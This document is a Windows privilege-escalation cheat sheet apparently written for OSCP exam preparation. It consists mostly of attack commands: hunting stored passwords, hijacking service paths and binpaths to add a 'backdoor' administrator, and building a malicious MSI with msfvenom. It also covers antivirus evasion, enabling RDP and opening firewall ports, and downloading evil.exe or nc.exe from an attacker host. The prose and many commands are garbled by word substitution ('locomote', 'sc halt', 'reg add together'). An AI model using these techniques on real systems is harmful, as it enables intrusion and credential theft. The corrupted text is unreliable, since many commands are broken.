Oscp - Windows Priviledge Escalation

Information Gathering

+ What organisation are nosotros connected to?

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

+ Get the hostname as well as username (if available)

hostname echo %username%

+ Learn nearly your environment

SET echo %PATH%

+ List other users on the box

net users cyberspace user <username>

+ Networking/Routing Info

ipconfig /all road impress arp -A

+ Active Network Connections

netstat -ano

+ Firewall Status (only on Win XP SP2 as well as above)

netsh firewall demonstrate dry soil netsh firewall demonstrate config netsh advfirewall firewall demonstrate dominion all

+ Scheduled tasks

schtasks /query /fo LIST /v

+ Check how Running processes link to started services

tasklist /SVC       

+ Windows services that are started:

net start

+ Driver madness (3rd political party drivers may conduct keep holes)

DRIVERQUERY

+ Check systeminfo output against exploit-suggester

https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py python windows-exploit-suggester.py -d 2017-05-27-mssb.xls -i systeminfo.txt 

+ Run windows-privesc script

https://github.com/pentestmonkey/windows-privesc-check

---

WMIC

Windows Management Instrumentation Command Line
Windows XP requires admin
+ Use wmic_info.bat script for automation

http://www.fuzzysecurity.com/tutorials/files/wmic_info.rar     

+ System Info

wmic COMPUTERSYSTEM instruct TotalPhysicalMemory,caption wmic CPU Get /Format:List

+ Check spell level

wmic qfe instruct Caption,Description,HotFixID,InstalledOn

1. Look for privilege escalation exploits as well as expect upward their respective KB spell numbers. Such exploits include, but are non express to, KiTrap0D (KB979682), MS11-011 (KB2393802), MS10-059 (KB982799), MS10-021 (KB979683), MS11-080 (KB2592799)
2. After enumerating the OS version as well as Service Pack you lot should discovery out which privilege escalation vulnerabilities could locomote present. Using the KB spell numbers you lot tin grep the installed patches to encounter if whatsoever are missing
3. Search patches for given spell

   wmic qfe instruct Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."

   Examples:
   

Windows 2K SP4 - Windows vii (x86): KiTrap0D (KB979682)

wmic qfe instruct Caption,Description,HotFixID,InstalledOn | findstr /C:"KB979682"  

Windows Vista/2008 6.1.6000 x32,Windows Vista/2008 6.1.6001 x32,Windows vii 6.2.7600 x32,Windows 7/2008 R2 6.2.7600 x64. (no practiced exploit - unlikely Microsoft Windows Vista/7 - Elevation of Privileges (UAC Bypass))

wmic qfe instruct Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2393802"

---

Stored Credentials

1. Directories that comprise the configuration files (however improve banking enterprise fit the entire filesystem). These files either comprise clear-text passwords or inwards a Base64 encoded format.

   C:\sysprep.inf C:\sysprep\sysprep.xml %WINDIR%\Panther\Unattend\Unattended.xml %WINDIR%\Panther\Unattended.xml 

2. When the box is connected to a Domain:
   1. Look for Groups.xml inwards SYSVOL
      GPO preferences tin locomote used to do local users on domain. So passwords mightiness locomote stored there. Any authenticated user volition conduct keep read access to this file. The passwords is encryptes amongst AES. But the static fundamental is published on the msdn website. Thus it tin locomote decrypted.
   2. Search for other policy preference files that tin conduct keep the optional “cPassword” attribute set:

      Services\Services.xml: Element-Specific Attributes ScheduledTasks\ScheduledTasks.xml: Task Inner Element, TaskV2 Inner Element, ImmediateTaskV2 Inner Element Printers\Printers.xml: SharedPrinter Element Drives\Drives.xml: Element-Specific Attributes DataSources\DataSources.xml: Element-Specific Attributes

3. Automated Tools
   1. Metasploit Module

      post/windows/gather/credentials/gpp post/windows/gather/enum_unattend

   2. Powersploit

      https://github.com/PowerShellMafia/PowerSploit Get-GPPPassword Get-UnattendedInstallFile Get-Webconfig Get-ApplicationHost Get-SiteListPassword Get-CachedGPPPassword Get-RegistryAutoLogon

4. Search filesystem:
   1. Search for specific keywords:

      dir /s *pass* == *cred* == *vnc* == *.config*

   2. Search certainly file types for a keyword

      findstr /si password *.xml *.ini *.txt

   3. Search for certainly files

      dir /b /s unattend.xml dir /b /s web.config dir /b /s sysprep.inf dir /b /s sysprep.xml dir /b /s *pass* dir /b /s vnc.ini

   4. Grep the registry for keywords (e.g. “passwords”)

      reg inquiry HKLM /f password /t REG_SZ /s reg inquiry HKCU /f password /t REG_SZ /s reg inquiry "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" reg inquiry "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" reg inquiry "HKCU\Software\SimonTatham\PuTTY\Sessions" reg inquiry HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

   5. Find writeable files

      dir /a-r-d /s /b

      1. /a is to search for attributes. In this illustration r is read exclusively as well as d is directory. The minus signs negate those attributes. So we're looking for writable files only.
      2. /s way recurse subdirectories
      3. /b way bare format. Path as well as filename only.

---

Trusted Service Paths

1. List all unquoted service paths (minus built-in Windows services) on our compromised machine:

   wmic service instruct name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ 

   Suppose nosotros found:
   

   C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe

   If you lot expect at the registry entry for this service amongst Regedit you lot tin encounter the ImagePath value is:
   

   C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe 

   To locomote secure it should locomote similar this:
   

   “C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe”

   When Windows attempts to run this service, it volition expect at the next paths inwards social club as well as volition run the outset EXE that it volition find:
   

   C:\Program.exe C:\Program Files.exe C:\Program Files(x86)\Program Folder\A.exe ...

2. Check permissions of folder path

   icacls "C:\Program Files (x86)\Program Folder" 

3. If nosotros tin write inwards the path nosotros flora a backdoor amongst the same cite amongst the service as well as restart the service.

Metasploit module:

exploit/windows/local/trusted_service_path

---

Vulnerable Services

Search for services that conduct keep a binary path (binpath) holding which tin locomote modified yesteryear non-Admin users - inwards that illustration alter the binpath to execute a ascendency of your own.
Note: Windows XP shipped amongst several vulnerable built-in services.
Use accesschk from SysInternals to search for these vulnerable services.

https://technet.microsoft.com/en-us/sysinternals/bb842062.aspx

For Windows XP, version 5.2 of accesschk is needed:

https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe

accesschk.exe -uwcqv "Authenticated Users" * /accepteula accesschk.exe -qdws "Authenticated Users" C:\Windows\ /accepteula accesschk.exe -qdws Users C:\Windows\ 

Then inquiry the service using Windows sc:

sc qc <vulnerable service name>

Then alter the binpath to execute your ain commands (restart of the service volition most probable locomote needed):

sc config <vuln-service> binpath= "net user backdoor backdoor123 /add"  sc halt <vuln-service> sc start <vuln-service> sc config <vuln-service> binpath= "net localgroup Administrators backdoor /add"  sc halt <vuln-service> sc start <vuln-service>

Note - Might demand to purpose the depend attribute explicitly:

sc halt <vuln-service> sc config <vuln-service> binPath= "c:\inetpub\wwwroot\runmsf.exe" depend= "" start= demand obj= ".\LocalSystem" password= "" sc start <vuln-service>

Metasploit module:

exploit/windows/local/service_permissions

---

AlwaysInstallElevated

AlwaysInstallElevated is a setting that allows non-privileged users the powerfulness to run Microsoft Windows Installer Package Files (MSI) amongst elevated (SYSTEM) permissions.
Check if these 2 registry values are develop to “1”:

reg inquiry HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated  reg inquiry HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

If they are, do your ain malicious msi:

msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi

Then purpose msiexec on victim to execute your msi:

msiexec /quiet /qn /i C:\evil.msi

Metasploit module:

exploit/windows/local/always_install_elevated

---

Bypassing AV

• Use Veil-Evasion
• Create your ain executable yesteryear “compiling” PowerShell scripts
• Use Metasploit to substitute custom EXE as well as MSI binaries. You tin develop EXE::Custom or MSI::Custom to betoken to your binary prior to executing the module.

---

Getting GUI

+ Using meterpreter, inject vnc session:

run post/windows/manage/payload_inject payload=windows/vncinject/reverse_tcp lhost=<yourip> options=viewonly=false

+ Enable RDP:

netsh firewall develop service RemoteDesktop enable

reg add together "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t  REG_DWORD /d 0 /f reg add together "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f

sc config TermService start= machine cyberspace start Termservice netsh.exe firewall add together portopening TCP 3389 "Remote Desktop"

OR:

netsh.exe advfirewall firewall add together dominion name="Remote Desktop - User Mode (TCP-In)" dir=in action=allow  program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound dominion for the  Remote Desktop service to permit RDP traffic. [TCP 3389] added yesteryear LogicDaemon's script" enable=yes  profile=private,domain localport=3389 protocol=tcp

netsh.exe advfirewall firewall add together dominion name="Remote Desktop - User Mode (UDP-In)" dir=in action=allow  program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound dominion for the  Remote Desktop service to permit RDP traffic. [UDP 3389] added yesteryear LogicDaemon's script" enable=yes  profile=private,domain localport=3389 protocol=udp

OR (meterpreter)

run post/windows/manage/enable_rdp

https://www.offensive-security.com/metasploit-unleashed/enabling-remote-desktop/

---

Python exploits

Compiling Python Exploits for Windows on Linux

1. install pyinstaller of windows amongst vino on Kali as well as and hence

   wine  /.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile 18176.py

2. run `pyinstaller` located nether the same directory every bit Python scripts

   wine  /.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile HelloWorld.py

3. Execute amongst wine

   wine  /.wine/drive_c/dist/HelloWorld.exe

---

File Transfers

bound commands on crunch to locomote non-interactive
https://blog.netspi.com/15-ways-to-download-a-file/

TFTP

Windows XP as well as Win 2003 comprise tftp client. Windows vii do non yesteryear default
tfpt clients are normally non-interactive, hence they could locomote through an obtained crunch

atftpd --daemon --port 69 /tftp

Windows> tftp -i 192.168.30.45 GET nc.exe

FTP

Windows comprise FTP customer but they are normally interactive
Solution: scripted parameters inwards ftp client: ftp -s
ftp-commands

echo open 192.168.30.5 21> ftp.txt echo USER username password >> ftp.txt echo bin >> ftp.txt echo GET evil.exe >> ftp.txt echo good daytime >> ftp.txt ftp -s:ftp.txt

VBScript

wget-vbs script echo fob again, re-create glue the commands inwards the crunch

echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs echo Err.Clear >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs echo http.Open "GET",strURL,False >> wget.vbs echo http.Send >> wget.vbs echo varByteArray = http.ResponseBody >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs echo strData = "" >> wget.vbs echo strBuffer = "" >> wget.vbs echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs echo Next >> wget.vbs echo ts.Close >> wget.vbs

cscript wget.vbs http://10.11.0.102/evil.exe test.txt

Powershell

echo $storageDir = $pwd > wget.ps1 echo $webclient = New-Object System.Net.WebClient >>wget.ps1 echo $url = "http://10.11.0.102/powerup.ps1" >>wget.ps1 echo $file = "powerup.ps1" >>wget.ps1 echo $webclient.DownloadFile($url,$file) >>wget.ps1

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Webdav

On kali linux install wsgidav as well as cheroot

pip install wsgidav cheroot

Start the wsgidav on a restricted folder:

mkdir /tmp/webdav_folder wsgidav --host=0.0.0.0 --port=80 --root=/tmp/webdav_folder

On Windows mountain this folder using cyberspace use:

net purpose * http://YOUR_IP_ADDRESS/

Reference: https://github.com/mar10/wsgidav

BitsAdmin

bitsadmin /transfer n http://domain/file c:%homepath%file

debug.exe

First purpose upx or similar to compress the executable:

upx -9 nc.exe

Then purpose exe2bat to convert the executable into a serial of echo commands that are meant to locomote copied pasted inwards the remote system:

wine exe2bat.exe nc.exe nc.txt

Then re-create glue each ascendency from nc.txt inwards the remote system. The commands volition gradually rebuild the executable inwards the target machine.

certuril

certutil.exe -URL   volition fetch ANY file as well as download it here: 

C:\Users\subTee\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content

---

Resources

https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py
http://www.fuzzysecurity.com/tutorials/16.html
http://www.greyhathacker.net/?p=738
https://toshellandback.com/2015/11/24/ms-priv-esc/
https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
https://www.toshellandback.com/2015/08/30/gpp/
https://www.toshellandback.com/2015/09/30/anti-virus/
https://www.veil-framework.com/framework/veil-evasion/
https://www.toshellandback.com/2015/11/24/ms-priv-esc/
https://null-byte.wonderhowto.com/how-to/hack-like-pro-use-powersploit-part-1-evading-antivirus-software-0165535/
https://pentestlab.blog/2017/04/19/stored-credentials/